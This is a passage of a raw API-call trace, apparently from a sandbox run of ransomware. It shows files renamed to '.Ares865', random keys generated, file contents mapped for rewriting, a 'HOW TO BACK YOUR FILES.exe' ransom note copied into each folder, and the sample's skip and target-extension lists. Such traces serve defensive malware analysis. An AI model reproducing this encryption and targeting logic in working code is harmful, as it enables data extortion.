[0060.553] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Settings.ini.Ares865") returned 83 [0060.553] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Settings.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows sidebar\\settings.ini.ares865"), dwFlags=0x1) returned 1 [0060.555] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Settings.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows sidebar\\settings.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.556] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=84) returned 1 [0060.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0060.556] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0060.557] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.557] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0060.557] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x164 [0060.559] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0060.560] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0060.560] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.560] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0060.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.561] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.561] CloseHandle (hObject=0x164) returned 1 [0060.561] CloseHandle (hObject=0x15c) returned 1 [0060.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0060.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.561] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.ini", cAlternateFileName="")) returned 0 [0060.561] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.561] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2388 [0060.561] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" [0060.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0060.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0060.562] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned 70 [0060.562] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets" [0060.562] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.562] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.562] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.562] GetLastError () returned 0x0 [0060.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.562] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.562] CloseHandle (hObject=0x12c) returned 1 [0060.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.562] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.563] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.563] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.563] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.563] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.563] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.563] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.563] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.563] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.563] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.563] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.563] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.563] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.563] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.563] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2368 [0060.563] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media" [0060.563] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.563] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0060.563] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media") returned 60 [0060.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media" [0060.563] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.563] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.564] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.564] GetLastError () returned 0x0 [0060.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.564] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.564] CloseHandle (hObject=0x12c) returned 1 [0060.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.564] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.564] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.564] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.564] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.564] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.564] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.564] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.564] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.564] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.564] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.565] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="12.0", cAlternateFileName="")) returned 1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="aoldtz.exe") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2=".") returned 1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="..") returned 1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="windows") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="bootmgr") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="temp") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="pagefile.sys") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="boot") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="ids.txt") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="ntuser.dat") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="perflogs") returned -1 [0060.565] lstrcmpiW (lpString1="12.0", lpString2="MSBuild") returned -1 [0060.565] lstrlenW (lpString="12.0") returned 4 [0060.565] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\*") returned 62 [0060.565] lstrcpyW (in: lpString1=0x2cce47a, lpString2="12.0" | out: lpString1="12.0") returned="12.0" [0060.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0060.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e9e20 [0060.565] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2368 | out: ListHead=0x2e7710, ListEntry=0x2d2368) returned 0x2d2288 [0060.565] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.565] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.565] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.565] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.565] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2368 [0060.565] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" [0060.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0060.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0060.565] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0") returned 65 [0060.565] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" [0060.565] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.565] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.566] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.566] GetLastError () returned 0x0 [0060.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.566] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.566] CloseHandle (hObject=0x12c) returned 1 [0060.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.566] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.566] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.566] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.566] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.566] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.566] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.567] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.567] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.567] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.567] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.567] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a78ff20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a78ff20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.567] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.567] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMSDKNS.DTD", cAlternateFileName="")) returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="aoldtz.exe") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="..") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="windows") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="bootmgr") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="temp") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="pagefile.sys") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="boot") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="ids.txt") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="ntuser.dat") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="perflogs") returned 1 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="MSBuild") returned 1 [0060.567] lstrlenW (lpString="WMSDKNS.DTD") returned 11 [0060.567] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\*") returned 67 [0060.567] lstrcpyW (in: lpString1=0x2cce484, lpString2="WMSDKNS.DTD" | out: lpString1="WMSDKNS.DTD") returned="WMSDKNS.DTD" [0060.567] lstrlenW (lpString="WMSDKNS.DTD") returned 11 [0060.567] lstrlenW (lpString="Ares865") returned 7 [0060.567] lstrcmpiW (lpString1="KNS.DTD", lpString2="Ares865") returned 1 [0060.567] lstrlenW (lpString=".dll") returned 4 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".dll") returned 1 [0060.567] lstrlenW (lpString=".lnk") returned 4 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".lnk") returned 1 [0060.567] lstrlenW (lpString=".ini") returned 4 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".ini") returned 1 [0060.567] lstrlenW (lpString=".sys") returned 4 [0060.567] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".sys") returned 1 [0060.567] lstrlenW (lpString="WMSDKNS.DTD") returned 11 [0060.568] lstrlenW (lpString="bak") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="bak") returned 1 [0060.568] lstrlenW (lpString="ba_") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="ba_") returned 1 [0060.568] lstrlenW (lpString="dbb") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="dbb") returned 1 [0060.568] lstrlenW (lpString="vmdk") returned 4 [0060.568] lstrcmpiW (lpString1=".DTD", lpString2="vmdk") returned -1 [0060.568] lstrlenW (lpString="rar") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="rar") returned -1 [0060.568] lstrlenW (lpString="zip") returned 3 [0060.568] lstrcmpiW (lpString1="DTD", lpString2="zip") returned 